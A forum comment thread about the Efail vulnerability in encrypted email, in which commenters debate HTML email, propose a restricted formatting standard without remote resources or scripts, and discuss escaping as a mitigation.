1. 7
  1. 3

    HTML email is problematic indeed. But entirely opting out of it is difficult. My favourite example is eBay; it’s automatic emails are just plain impossible to read without parsing the HTML.

    What bugs me on the discussion about Efail and HTML email is that it’s always an all-or-nothing discussion. Either you accept reality and live with HTML email or you reject it and go plain text. My opinion is that neither is the correct way. What we need is a new standard. A standard for formatted email that does not expose the difficulties and dangers of HTML email and allows more formatting than plain text. Before someone is going to mention this XKCD I want to point out that HTML email is not even a standard, which is part of the problem.

    I envision this new standard such that it allows things like this:

    • General markup – bold, italic, underline, etc.
    • Inline images based on image data sent with the email (not web images)
    • Letterhead with logo and legally required information; many companies try to abuse HTML email for this. If this is properly defined, then terminal clients can detect that information and simply not show it (e.g. omit the logo).

    The list is not complete, but there are certainly things that should never be on it. For example, this new standard should not allow embedding of remote resources for privacy and security reasons. Tracking pixels for example should be impossible, and without the ability to “phone home”, attacks like Efail are not possible. Similaryly, there’s no reason to allow script execution (like JavaScript) in e-mails.

    RFC 3676 (format=flowed) never got widely adapted, and not even Thunderbird gets it right appearently. It also doesn’t address the problem with markup.

    1. 3

      I don’t know if a new standard would be required, beyond just HTML. Nothing says that user agents must implement the whole HTML spec, including fetching remote resources, CSS, etc. Your stripped-down markup format could be implemented right now as a “stripped-down” HTML renderer. For example, I use Emacs and mu4e to read my email, which calls out to w3m to render the page as slightly prettified text (e.g. emphasis, underlines, etc. work; presumably using ANSI terminal escape codes). There’s no reason that’s limited to text though; I’d imagine it’s safe enough to render anything as long as (a) no external resources are fetched (everything must be included in the email, e.g. as MIME parts or data URIs) and (b) the result is inert (nothing clickable, nothing that interacts with external resources, etc.).

      From the sounds of it, this Efail problem would still pose a couple of problems, even if some new restricted markup format were used. Firstly, part of the trick seems to be a general problem with any delimited markup; e.g. one part contains <a href="... whilst another contains >. That would still be a problem with, say, [x](... and ) in markdown. Whilst it can be mitigated by escaping/quoting discipline, as the article mentions, that requires effort for every implementation. The other problem, exfiltration of decrypted data, seems to me like it would still be problematic for plain text. Even if we have an inert, non-clickable format, people will still want to visit URLs sent via email (e.g. password resets, etc.). Even if we show the entire URL, and force the user to copy/paste it by hand, it might not be obvious that decrypted data has been leaked. For example if it’s something machine-generated and nestled inside an innocuous looking parameter of an ‘unsubscribe’ URL. I’m not familiar enough with PGP, etc. to know how difficult it would be to outright forbid such things (e.g. forbidding mixed encrypted/non-encrypted messages entirely)

    2. 1

      Isn’t Efail an issue because PGP doesn’t consider HTML to be a thing in the first place? character escaping isn’t exactly a new technology (though of course things are hard). It just feels like the way PGP works is really hacky and just not great.

      In an alternate universe PGP emails have to escape HTML chars, and if the escaping isn’t present (like < shows up anywhere in the email) the email isn’t rendered.